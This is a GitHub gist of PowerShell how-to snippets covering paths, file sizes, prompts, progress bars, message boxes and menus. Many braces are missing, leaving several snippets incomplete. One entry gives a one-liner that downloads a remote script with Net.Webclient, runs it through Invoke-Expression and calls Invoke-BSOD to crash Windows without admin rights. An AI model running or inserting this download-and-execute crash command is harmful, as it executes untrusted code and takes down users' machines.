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Last active November 12, 2022 19:50
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[Powershell Examples] #PowerShell #Examples
Diffrent methods for displaying relative path
# Existing Path
$PWD | Resolve-Path -Relative
# Replace String
$Path -replace [regex]::Escape((Get-Location).Path), '.'
Get image information
Add-Type -AssemblyName System.Drawing
$Image = [System.Drawing.Image]::FromFile('.\path\to\img.png')
Retreive a timestamp of when an item was accessed.
Write-Host "`nThe " + "$" + "HOME Directory was last accessed at: " + $(Get-Item $HOME).LastAccessTime
Measure the amount of loaded modules.
Write-Host "Number of modules loaded = " + (Get-Module).Count
Change item attributes, i.e. 'Hidden'
! For files/folders that are already hidden, Force paramater is REQUIRED!
Otherwise Get-Item/Get-ChildItem cannot access the item.
$Path = "your_path_here"
# For a single file, you can change the attributes property, like this:
$Item = Get-Item -Path:$Path -Force
$Item.Attributes = "Hidden"
# To hide everything within a folder, you can use Get-ChildItem, like this:
Get-ChildItem -Path:$Path -Recurse -Force | ForEach-Object { $_.Attributes = "Hidden" }
Invokes a Blue Screen of Death from remote script; w/o admin privileges.
# Quick One-liner
Invoke-Expression((New-Object Net.Webclient).DownloadString('')); Invoke-BSOD
# Seperated
$URI = ''
Invoke-Expression((New-Object Net.Webclient).DownloadString($URI))
Determine human readable filesize
# !IMPORTANT: Get-Help command wont work if script starts with function.
# This is required for example scripts to generate markdown description from Synopsis.
Write-Host "`n" (Get-Help $PSCommandPath).Synopsis
function DisplayInBytes($Value) {
$Index = 0
$Suffix = "B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB"
while ($Value -gt 1kb) {
$Value = $Value / 1kb
"{0:N1} {1}" -f $Value, $Suffix[$Index]
# Invocation context, only execute if NOT sourced
if ($MyInvocation.InvocationName -eq '.') {
Write-Host "This script is not designed to be sourced" -ForegroundColor Red
# Execute Example
Write-Host "Directory Information" -ForegroundColor Magenta
$Files = Get-ChildItem -Recurse
$Bytes = ($Files | Measure-Object -Property Length -Sum).Sum
$Hash = [ordered]@{
Filecount = $Files.Count
WorkingDir = $PWD
$Hash | Format-Table -HideTableHeaders
Write-Host "Static Measurements" -ForegroundColor Magenta
$Hash = [ordered]@{
Bytes = $Bytes
Kilobytes = ("{0} KB" -f ($Bytes / 1KB))
Megabytes = ("{0} MB" -f ($Bytes / 1MB))
Gigabytes = ("{0} GB" -f ($Bytes / 1GB))
Terabytes = ("{0} TB" -f ($Bytes / 1TB))
$Hash | Format-Table -HideTableHeaders
Write-Host "Dynamic Measurements" -ForegroundColor Magenta
$Hash = [ordered]@{
Bytes = $Bytes
Truncated = $(DisplayInBytes $Bytes)
$Hash | Format-Table -HideTableHeaders
GUI listview of symbolic links, selection opens path in explorer.
$ReparsePoints = Get-ChildItem -Path $ENV:USERPROFILE -Recurse -Depth 4 |
Where-Object { $_.Attributes -match "ReparsePoint" }
$Selection = $ReparsePoints | Out-GridView -PassThru -Title "Symbolic Links"
if ( $Null -ne $Selection) { Invoke-Item $Selection }
Display a color gradient in the terminal. Just for fun.
# !IMPORTANT: Get-Help command wont work if script starts with function.
# This is required for example scripts to generate markdown description from Synopsis.
Write-Host "`n" (Get-Help $PSCommandPath).Synopsis
function Show-AnsiColorGradient {
# ANSI escape character
$ansi_escape = [char]27
try {
for ($r = 0; $r -le 255; $r += 16) {
for ($g = 0; $g -le 255; $g += 8) {
Write-Host "" # Separate
for ($b = 0; $b -le 255; $b += 4) {
$ansi_command = "$ansi_escape[48;2;{0};{1};{2}m" -f $r, $g, $b
$text = " "
$ansi_terminate = "$ansi_escape[0m"
$out = $ansi_command + $text + $ansi_terminate
Write-Host -NoNewline $out
finally {
Write-Host "" # Separate
Prompt user for [y/n] confirmation.
* Consider:
If a cmdlet supports the -confirm parameter, it can be forced to prompt before any action.
I just like version #1 because it's concise.
# Version #1
$Message = "Are you sure you wish to commit this action?"
while ( -not ( ($Choice = (Read-Host $Message)) -match "y|n")) { $Message = "Please specify [y/n]" }
if ($Choice -notmatch "[yY]") { break }
# Version #2
$Caption = "Confirm"
$Message = "Are You Sure?"
$Yes = New-Object System.Management.Automation.Host.Choicedescription "&Yes", "Help"
$No = New-Object System.Management.Automation.Host.Choicedescription "&No", "Help"
$Choices = [System.Management.Automation.Host.Choicedescription[]]($Yes, $No)
$Answer = $Host.Ui.Promptforchoice($Caption, $Message, $Choices, 0)
Switch ($Answer) {
0 { "You Entered 0"; Break }
1 { "You Entered 1"; Break }
Make a GUI Message Box visible to the user
* Windows Forms:
Add-Type -AssemblyName System.Windows.Forms
* PresentationFramework:
Add-Type -AssemblyName PresentationFramework
# MessageBox Dialog
$Title = 'MessageBox Example'
$Message = 'What action do you wish to take?'
$ButtonType = 'YesNoCancel'
$MessageIcon = 'Error'
Add-Type -AssemblyName PresentationFramework
$MsgBox = [System.Windows.MessageBox]::Show($Message, $Title, $ButtonType, $MessageIcon)
switch ($MsgBox) {
'Yes' { Write-Output "You clicked 'Yes'" }
'No' { Write-Output "You clicked 'No'" }
'Cancel' { Write-Output "You clicked 'Cancel'" }
Comparing the performance of two serperate appending methods
PowerShell, arrays are of a fixed size.
This means that each time you use the '+=' in the background you are creating a brand new array,
containing the old contents plus the newly appended item.
This is computationally expensive! It would be better to use [Collections.Generic.List]
# Set the number of loop iterations
$Iterations = 10000
# Powershell version information
Write-Host "`nPS $($PSVersionTable.PSEdition) $($PSVersionTable.PSVersion.ToString())`n"
$Measurement_01 = Measure-Command {
$Array = @()
1..$Iterations | ForEach-Object { $Array += "$_" }
# Example #1 -- Standard Array
Write-Host "'Array +='`t: " -NoNewline
Write-Host "Milliseconds: $($Measurement_01.TotalMilliseconds)"
# Example #2 -- Generic List
$Measurement_02 = Measure-Command {
$List = [System.Collections.Generic.List[string]]::new()
1..$Iterations | ForEach-Object { $null = $List.Add("$_") }
Write-Host "'List.Add()'`t: " -NoNewline
Write-Host "Milliseconds: $($Measurement_02.TotalMilliseconds)"
# Compute difference
Write-Host "'Complete'`t: " -NoNewline
Write-Host "Milliseconds: $($Measurement_02.TotalMilliseconds + $Measurement_01.TotalMilliseconds)"
Continue script action after interuption.
Using 'try : finally' blocks to continue some action,
even if the user stops the script preemptively.
the stationary loop counter showed me that when calculating the length of an integer,
you can convert it to a string.
Try {
$counter = 0
Write-Host "`nThis script will not stop on its own" -fore yellow
Write-Host "Press 'Ctrl+C' to stop the current script...`n"
Write-Host "Loop: " -NoNewline
While ($True) {
# Runs ad infinitum
Write-Host ("$counter" + ("`b" * $counter.tostring().length)) -NoNewline
Start-Sleep 1
Finally {
Write-Host "`nScript has been terminated." -fore red; ""
Check script invocation method
Verify the invocation method of the current script.
Allowing for similar functionality to python's if __name == '__main__':
A script function can be sourced without running the payload.
Or executed as a standalone script.
# Checking Command Origin
# Runspace if script is executed
# Internal if script is imported
if ($MyInvocation.CommandOrigin -eq 'Runspace') { Write-Host "Runspace" }
if ($MyInvocation.CommandOrigin -eq 'Internal') { Write-Host "Internal" }
# Alternatively, more information about how the script was started
If ($MyInvocation.InvocationName -eq '&') {
"Called using operator: '$($MyInvocation.InvocationName)'"
ElseIf ($MyInvocation.InvocationName -eq '.') {
"Dot sourced: '$($MyInvocation.InvocationName)'"
ElseIf ((Resolve-Path -Path $MyInvocation.InvocationName).ProviderPath -eq $MyInvocation.MyCommand.Path) {
"Called using path: '$($MyInvocation.InvocationName)'"
Does something with paths supplied via pipeline.
Specifies a path to one or more locations. Wildcards are permitted.w
The default location is the current directory (.).
# !IMPORTANT: Get-Help command wont work if script starts with function.
# This is required for example scripts to generate markdown description from Synopsis.
Write-Host "`n" (Get-Help $PSCommandPath).Synopsis
Function Test-Pipeline {
Mandatory = $False,
ValueFromPipeline = $True,
ValueFromPipelineByPropertyName = $True
[PSDefaultValue(Help = 'Description for default value.')]
[String[]]$Path = '.'
BEGIN { Write-Host "Script Begin!" }
$Path | ForEach-Object {
$Item = Get-Item $_
Write-Host "Item: $Item"
END { Write-Host "Script End!" }
Display & update progress bar
For this we will be counting for 1 minute; the Start-Sleep function is 1 second
By looping through each second and calculating the percent complete we can update the progess bar.
# !IMPORTANT: Get-Help command wont work if script starts with function.
# This is required for example scripts to generate markdown description from Synopsis.
Write-Host "`n" (Get-Help $PSCommandPath).Synopsis
function Test-ProgressBar {
Write-Host -fore Cyan "Let's just take a minute to relax..."
For ($i = 0; $i -le 60; $i++) {
Write-Progress -Activity "I'll count. $i second[s]" -PercentComplete ($i / 60 * 100)
Start-Sleep 1
Example function for '-WhatIf' parameter support.
# !IMPORTANT: Get-Help command wont work if script starts with function.
# This is required for example scripts to generate markdown description from Synopsis.
Write-Host "`n" (Get-Help $PSCommandPath).Synopsis
Function Test-WhatIf {
ForEach ($item in $Objects) {
If ($PSCmdlet.ShouldProcess("$item", "Action")) {
"Action: -> $item" # This will only run without '-WhatIf'
# Invocation context, only execute if NOT sourced
if ($MyInvocation.InvocationName -ne '.') {
Test-WhatIf "ITEM" -WhatIf
Display text in the center of the terminal window.
* Bonus Example: Selection Menu
A function that calculates the center of the console by character columns to display some text,
This is mostly a stylistic function. It doesn't fair very well when the console window is resized.
# !IMPORTANT: Get-Help command wont work if script starts with function.
# This is required for example scripts to generate markdown description from Synopsis.
Write-Host "`n" (Get-Help $PSCommandPath).Synopsis
function Write-HostCenter {
Write-Host ("{0}{1}" -f (' ' * (([Math]::Max(0, $Host.UI.RawUI.BufferSize.Width / 2) - [Math]::Floor($Message.Length / 2)))), $Message)
function Show-Menu {
Param ([string]$Title = 'My Menu')
Write-HostCenter "================ $Title ================"
Write-HostCenter "1: Press '1' for this option."
Write-HostCenter "2: Press '2' for this option."
Write-HostCenter "3: Press '3' for this option."
Write-HostCenter "Q: Press 'Q' to quit."
Do {
$input = Read-Host "Please make a selection"
Switch ($input) {
'1' { 'You chose option #1' }
'2' { 'You chose option #2' }
'3' { 'You chose option #3' }
'q' { Return }
Until ($input -eq 'q')
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